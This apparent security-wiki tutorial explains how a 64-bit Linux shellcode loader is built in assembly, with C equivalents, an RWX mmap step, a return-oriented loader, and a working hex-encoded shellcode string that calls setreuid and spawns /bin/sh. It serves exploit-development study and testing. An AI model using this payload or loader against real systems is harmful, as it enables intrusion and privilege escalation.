Shellcode/Loaders
Shellcode loaders are used to test shellcode before use in a buffer overflow or other form of binary exploitation. A user-friendly loader takes the shellcode as a command line argument and copies it into freshly allocated executable memory. This article examines the construction of such a loader for Linux in assembly language for the 64-bit x86 instruction set architecture; a 32-bit shellcode loader is provided in the appendix.
Executable loader
- This section examines the 64-bit loader provided in the shellcodecs package.
Command line arguments
When the process starts, the argument count sits at the top of the stack, followed by a pointer to the program name (argument 0) and then a pointer to each command line argument. Popping into %rbx three times therefore discards the count and the program name and leaves %rbx holding a pointer to the first argument, the shellcode:
    _start:
        pop %rbx    # argc
        pop %rbx    # arg0 (program name)
        pop %rbx    # arg1 pointer (the shellcode)
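For comparison, the same selection can be sketched in C, where the C runtime has already unpacked the initial stack into argc and argv. The helper name shellcode_arg is hypothetical, and the argc check is an addition: the assembly loader performs no such check.

```c
#include <stddef.h>

/* Hypothetical helper: return the first command line argument,
 * i.e. the pointer the loader ends up with in %rbx after its
 * third pop. Unlike the assembly, this checks that the argument
 * exists and returns NULL when it does not. */
const char *shellcode_arg(int argc, char **argv)
{
    if (argc < 2 || argv == NULL)
        return NULL;
    return argv[1];
}
```

Calling shellcode_arg(argc, argv) from main() yields the same pointer the assembly obtains, or NULL when the loader was started without an argument.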
Executable memory allocation with mmap()
- See also: Unlinked 64-bit system calls, the 64-bit system call table
Because modern operating systems mark the stack non-executable by default, the shellcode cannot simply be run from where it sits among the process arguments. An executable memory region must be allocated for it instead. This is done with the mmap() system call.
The prototype for mmap() is:
    void *mmap(void *addr, size_t len, int prot, int flags, int fildes, off_t off);
On 64-bit Linux, system call arguments are passed in registers like so, with the system call number in %rax and the result returned in %rax:
    function_call(%rax) = function(%rdi,  %rsi,  %rdx,  %r10,  %r8,   %r9)
                  ^system          ^arg1  ^arg2  ^arg3  ^arg4  ^arg5  ^arg6
                   call #
First, the system call number for mmap() is placed into %rax:
    push $0x9       # mmap is system call 9
    pop %rax
The first argument (%rdi) of mmap() should be null so that the kernel chooses the address. Using xor, %rdi is set to zero:
    xor %rdi, %rdi
The desired size of the buffer (4096 bytes, or 0x1000 in hex) is passed in %rsi as the second argument to mmap().
The %rsi register is initialized to zero by pushing %rdi and popping %rsi:
    push %rdi
    pop %rsi
It is then incremented to 0x0001:
    inc %rsi
And shifted left 12 bits (1 shifted left 12 bits becomes 0x1000, or binary 00010000 00000000):
    shl $12, %rsi
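The arithmetic can be checked with a short C sketch. The function names are hypothetical. Note that the shift count is decimal 12 (0xc in hex); a count written as 0x12 would be 18 and would produce 0x40000 (256 KiB) rather than one 4096-byte page.

```c
#include <stdint.h>

/* Mirrors the three steps used to build the length in %rsi:
 * zero the register, increment it, then shift left by 12. */
uint64_t build_length(void)
{
    uint64_t rsi = 0;  /* push %rdi / pop %rsi, with %rdi == 0 */
    rsi += 1;          /* inc %rsi */
    rsi <<= 12;        /* shift left by 12 bits */
    return rsi;
}

/* The value 1 shifted left by an arbitrary count, for comparison. */
uint64_t one_shifted_by(unsigned count)
{
    return (uint64_t)1 << count;
}
```

Here build_length() returns 0x1000, while one_shifted_by(0x12) returns 0x40000.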
The third argument (%rdx) contains the memory permissions (read, write, execute, or none). Multiple permissions are combined with bitwise OR. Since ORing the flags PROT_READ, PROT_WRITE, and PROT_EXEC gives 7, the OR itself is skipped and the value 7 is stored directly in the %rdx register:
    push $0x7       # PROT_READ|PROT_WRITE|PROT_EXEC
    pop %rdx
The flags argument is built the same way as the "prot" argument, from the MAP_* constants. In this case MAP_PRIVATE|MAP_ANONYMOUS, which evaluates to 0x22, is stored in %r10:
    push $0x22      # MAP_PRIVATE|MAP_ANONYMOUS
    pop %r10
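The two constants can be reproduced from the system headers. The sketch below assumes Linux, where PROT_READ, PROT_WRITE and PROT_EXEC are 1, 2 and 4, and MAP_PRIVATE and MAP_ANONYMOUS are 0x02 and 0x20; other systems may define different values. The function names are hypothetical.

```c
#ifndef _GNU_SOURCE
#define _GNU_SOURCE   /* exposes MAP_ANONYMOUS under strict -std= modes */
#endif
#include <sys/mman.h>

/* Protection bits for the third mmap() argument (%rdx). */
int loader_prot(void)
{
    return PROT_READ | PROT_WRITE | PROT_EXEC;
}

/* Mapping flags for the fourth mmap() argument (%r10). */
int loader_flags(void)
{
    return MAP_PRIVATE | MAP_ANONYMOUS;
}
```

On Linux, loader_prot() evaluates to 7 and loader_flags() to 0x22, matching the immediates pushed by the loader.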
The final two arguments, the file descriptor and the offset, are not used by an anonymous mapping, so zero is stored in both %r8 and %r9:
    push %rdi
    push %rdi
    pop %r8
    pop %r9
Once the registers are set, a syscall is used to invoke mmap():
    syscall         # invoke mmap()
The %rax register now contains the pointer returned by mmap(). This is the buffer into which the shellcode will be copied.
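As a rough C equivalent of the register setup, the same request can be issued through the generic syscall() wrapper from libc. This is a sketch assuming Linux on x86-64. The helper name alloc_exec_page is hypothetical, and the NULL-on-failure handling is an addition that the assembly loader does not perform.

```c
#ifndef _GNU_SOURCE
#define _GNU_SOURCE   /* for syscall() and MAP_ANONYMOUS */
#endif
#include <stddef.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <unistd.h>

/* Hypothetical helper: request one read/write/execute page using
 * the same six argument values the loader places in registers.
 * Returns NULL on failure, for example where a security policy
 * forbids mappings that are both writable and executable. */
void *alloc_exec_page(void)
{
    long ret = syscall(SYS_mmap,   /* %rax: 9 on x86-64 */
                       NULL,       /* %rdi: addr, kernel chooses */
                       0x1000L,    /* %rsi: len, 4096 bytes */
                       (long)(PROT_READ | PROT_WRITE | PROT_EXEC), /* %rdx: 7 */
                       (long)(MAP_PRIVATE | MAP_ANONYMOUS),        /* %r10: 0x22 */
                       0L,         /* %r8: fd, ignored for anonymous maps */
                       0L);        /* %r9: offset */
    if (ret == -1)
        return NULL;
    return (void *)ret;
}
```

Linux ignores the file descriptor when MAP_ANONYMOUS is set, which is why passing zero works here; portable code usually passes -1 for that argument.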
Copying the code into the new memory
The %rsi register is initialized to 0 to be used as a counter:
    inject:
        xor %rsi, %rsi
%rdi is zeroed as well, because each byte is compared against %dil (the low byte of %rdi) to detect the null byte that marks the end of the shellcode:
        push %rsi
        pop %rdi
At the top of each iteration the current byte is compared with %dil. If it is null, the loop jumps to inject_finished, which finalizes the buffer before the code is executed:
    inject_loop:
        cmpb %dil, (%rbx, %rsi, 1)
        je inject_finished
Each byte of the shellcode is moved from %rbx + %rsi (current location) into %rax + %rsi (new executable memory) through %r10b, the single-byte sub-register of %r10:
        movb (%rbx, %rsi, 1), %r10b
        movb %r10b, (%rax, %rsi, 1)
%rsi is incremented as both the offset and the counter:
        inc %rsi
And then the loop restarts:
        jmp inject_loop
The inject_finished routine then appends the ret opcode, 0xc3, to the end of the shellcode:
    inject_finished:
        movb $0xc3, (%rax, %rsi, 1)
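The copy loop can be sketched in C as follows. The function name inject mirrors the assembly label, but the cap parameter and the error return are additions: the assembly loop has no bounds check against the 4096-byte buffer.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical C rendering of inject / inject_loop / inject_finished.
 * Copies bytes from src to dst until a null byte is found, then
 * appends a ret opcode (0xc3). Returns the number of shellcode
 * bytes copied, or (size_t)-1 if dst cannot hold them plus the ret. */
size_t inject(uint8_t *dst, size_t cap, const uint8_t *src)
{
    size_t i = 0;                 /* %rsi: offset and counter */

    while (src[i] != 0) {         /* cmpb %dil, (%rbx,%rsi,1) */
        if (i + 1 >= cap)         /* keep room for the ret byte */
            return (size_t)-1;
        dst[i] = src[i];          /* the two movb through %r10b */
        i++;                      /* inc %rsi */
    }
    if (i >= cap)
        return (size_t)-1;
    dst[i] = 0xc3;                /* movb $0xc3, (%rax,%rsi,1) */
    return i;
}
```

Because the loop stops at the first null byte, any shellcode passed to the loader must be free of null bytes. A command line argument cannot contain one in any case.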
Returning to the code
The code is returned to, rather than jumped to or called, because this more closely simulates the state of a vulnerable application at the time of a buffer overflow. A payload is reached through a return, so shellcode under test should be reached the same way.
First, ret_to_shellcode is called. The call pushes its return address, the address of exit, onto the stack, so that the ret at the end of the shellcode returns to <address of exit>.
        call ret_to_shellcode
The address of the shellcode (%rax) is then pushed on top of that return address. The ret instruction pops it and jumps into the shellcode, leaving the address of exit at the top of the stack:
    ret_to_shellcode:
        push %rax
        ret
When the shellcode completes, it will return to the exit function to exit cleanly:
    exit:
        push $60        # exit is system call 60
        pop %rax
        xor %rdi, %rdi  # exit status 0
        syscall
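C has no direct way to express push followed by ret, so the closest analogue is an indirect call through a function pointer. The sketch below is not the loader's method. It is a hypothetical demonstration, assuming Linux on x86-64, that places a tiny stand-in payload ("mov $42, %eax; ret") in an executable page and calls it. At entry to the called code, the top of the stack holds a return address, just as the address of exit does when the loader's ret lands in the shellcode. The stand-in contains null bytes, so it is copied with memcpy() rather than with a null-terminated loop.

```c
#ifndef _GNU_SOURCE
#define _GNU_SOURCE   /* for MAP_ANONYMOUS */
#endif
#include <stddef.h>
#include <string.h>
#include <sys/mman.h>

/* Hypothetical demo: run "mov $42, %eax; ret" from an executable page.
 * Returns the value the code leaves in %eax, or -1 if the demo cannot
 * run (non-x86-64 build, or the mapping was refused). */
int run_demo(void)
{
#if defined(__x86_64__)
    static const unsigned char code[] = {
        0xb8, 0x2a, 0x00, 0x00, 0x00,   /* mov $42, %eax */
        0xc3                            /* ret */
    };
    void *page = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC,
                      MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (page == MAP_FAILED)
        return -1;

    memcpy(page, code, sizeof code);

    /* Converting an object pointer to a function pointer is not
     * strict ISO C, but POSIX systems support it. */
    int (*entry)(void) = (int (*)(void))page;
    int result = entry();   /* the call pushes a return address */

    munmap(page, 0x1000);
    return result;
#else
    return -1;
#endif
}
```

On an x86-64 Linux system that permits writable and executable mappings, run_demo() returns 42; elsewhere it returns -1.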
Once the code is complete (source) it can be built the same way as any assembly program:
    ╭─user@host ~
    ╰─➤ as -oloader-64.o loader-64.s
    ╭─user@host ~
    ╰─➤ ld -oloader-64 loader-64.o
Or by typing `make' from the root directory of shellcodecs.
Using the executable loader
The shellcode invoked here is the same as the shellcode constructed and extracted earlier. Notice the change in prompt, and that exit returns the original prompt. This indicates that the shellcode executed successfully.
    ╭─user@host ~
    ╰─➤ ./loader "$(echo -en "\x48\x31\xff\x6a\x69\x58\x0f\x05\x57\x57\x5e\x5a\x48\xbf\x6a\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05");"
    [user@host ~]$ exit
    exit
    ╭─user@host ~
    ╰─➤
Return oriented loader
Return-oriented code can be tested with a loader as well, though a much smaller one suffices because return-oriented code should not require executable memory allocation:
    _start:
        pop %rbx    # argc
        pop %rbx    # arg0
        pop %rsp    # %rsp now points to arg1 in the stack
        ret         # pop the first address of the chain and jump to it
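Once %rsp points at the argument, each ret pops the next 8 bytes as a little-endian address and jumps to it, so the argument is consumed as a sequence of 64-bit words. The C sketch below only models how those words are read from the byte string. The helper name chain_word is hypothetical.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical helper: read the n-th 8-byte little-endian word of a
 * chain, i.e. the address that the n-th ret would pop once %rsp
 * points at the start of the argument. The word is assembled byte by
 * byte, so the result does not depend on host byte order. */
uint64_t chain_word(const uint8_t *chain, size_t n)
{
    uint64_t word = 0;
    for (int i = 7; i >= 0; i--)
        word = (word << 8) | chain[n * 8 + (size_t)i];
    return word;
}
```

For example, the eight bytes 0x41 through 0x48 at the start of the argument are read as the address 0x4847464544434241.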
See also
- Related tool: shellcodecs
Other loaders include the dynamic loader and the dynamic socket loader. These are used when the shellcode depends on the context of the vulnerable binary application containing a dynamic section for linking.